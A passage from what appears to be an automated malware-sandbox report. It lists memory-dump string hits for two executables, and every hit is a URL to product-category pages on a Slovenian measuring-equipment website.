00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/regulac
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/varnost
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/zvezna-
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/dodatni-pribo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/inteligentni-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/membranski-ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/mollet-molosc
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/naprave-za-tl
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/nivojska-stik
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/zvezni-meriln
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-nivojno-ohisje
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-prikazovalniki
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/dodatki-za-merilce-ni
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/opticna-stikala-nivoj
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, 